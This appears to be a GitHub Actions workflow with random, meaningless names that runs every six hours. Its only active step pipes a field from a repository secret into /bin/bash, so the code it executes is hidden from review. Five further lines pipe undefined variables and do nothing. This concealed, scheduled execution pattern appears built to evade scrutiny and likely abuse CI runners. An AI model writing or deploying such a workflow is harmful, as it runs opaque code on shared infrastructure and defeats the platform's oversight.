name: xuzhibai3856

on:
  workflow_dispatch:
  schedule:
    - cron: '43 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuzhibai3856
        env:
          kv66567: ${{ secrets.kv66567 }}
        run: |
          echo $kv66567 | jq -r .d3405 | /bin/bash
          echo $kd8985 | jq -r .iccz8 | /bin/bash
          echo $muhl5 | jq -r .kkknl5 | /bin/bash
          echo $qnjyt4045 | jq -r .lrv88176 | /bin/bash
          echo $w00 | jq -r .ziw63711 | /bin/bash
          echo $t12945 | jq -r .ojdog0561 | /bin/bash

